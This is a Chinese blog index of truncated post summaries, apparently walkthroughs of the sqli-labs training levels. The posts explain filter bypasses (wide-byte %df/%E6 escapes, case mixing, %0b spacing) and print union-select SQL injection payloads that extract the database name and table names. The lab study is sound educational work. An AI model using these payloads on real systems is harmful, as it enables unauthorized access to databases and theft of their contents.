摘要:
1.他和Less(34)关一样,查看源码,得知只是本关只是将过滤函数进行了替换: mysql_real_escape_string(),我们可以直接按照34关的方法即可,此处不再赘述 抓包之后,也是一样的问题 阅读全文
摘要:
1.查看一下php文件: 这里使用了mysql_real_escape_string()函数来进行过滤,对于mysql_real_escape_string函数而言,它会转义以下特殊字符:\x00 , \n , \r , \ ,' , " , \x1a 如果转义成功,那么该函数返回被转义的字符,如果 阅读全文
摘要:
1.是数字类型 的 2.爆破 (1)爆库:?id=-1 union select 1,version(),database()--+ (2)爆表:?id=-1 union select 1,group_concat(table_name),3 from information_schema.tabl 阅读全文
摘要:
1. 万能密码 这一关是POST型的注入,同样的将post传递过来的内容进行了转义处理,过滤了单引号、反斜杠。有之前的例子我们可以看到%df可以将转义的反斜杠给吃掉。而GET型的方式我们是以url形式提交的,因此数据会通过urlencode,如何将方法用在POST型的注入当中呢?我们可以将UTF-8 阅读全文
摘要:
1.和上一题一样的,payload都不用改 2.爆破 (1)爆库:?id=-1%E6' union select 1,2,database() --+ (2)爆表:?id=-1%E6' union select 1,group_concat(table_name),3 from informatio 阅读全文
摘要:
1.查看一下php文件: check_addslashes()会在单引号前加一个\ 例如:I'm hacker 传入addslashes(),得到:I\'m hacker 本题想以此阻止sql注入语句闭合,但是可以使用宽字节绕过: 原理大概来说就是,一个双字节组成的字符,比如一个汉字‘我’的utf8 阅读全文
摘要:
1.不知道为什么,明明写着是有括号的双引号字符型,却变成了单引号; 2.爆破: (1)爆库:?id=0')%0buniOn%0bsElEct%0b1,database(),3%0bor%0b('1')=('1 (2)爆表:?id=0')%0buniOn%0bsElEct%0b1,(group_con 阅读全文
摘要:
1.这个和Less(27)差不多,就是把参数变成 id=('1') 2.爆破 (1)爆库:?id=0')%0buniOn%0bsElEct%0b1,database(),3%0bor%0b('1')=('1 (2)爆表:?id=0')%0buniOn%0bsElEct%0b1,(group_conc 阅读全文
摘要:
1.和Less(27)一样,就是把单引号闭合变成双引号闭合 验证一下:?id=0"%0bor(1)=(1)%26%26%0b"1 2.爆破: (1)爆库: ?id=0"%0buniOn%0bsElEct%0b1,database(),3%0bor%0b"1"="1 (2)爆表:?id=0"%0bun 阅读全文
摘要:
1.查看一下php文件,发现不仅过滤了符号,还过滤了一些关键字,但是我们可以大小写结合 m (PCRE_MULTILINE)默认情况下,PCRE 认为目标字符串是由单行字符组成的(然而实际上它可能会包含多行), "行首"元字符 (^) 仅匹配字符串的开始位置, 而"行末"元字符 ($) 仅匹配字符串 阅读全文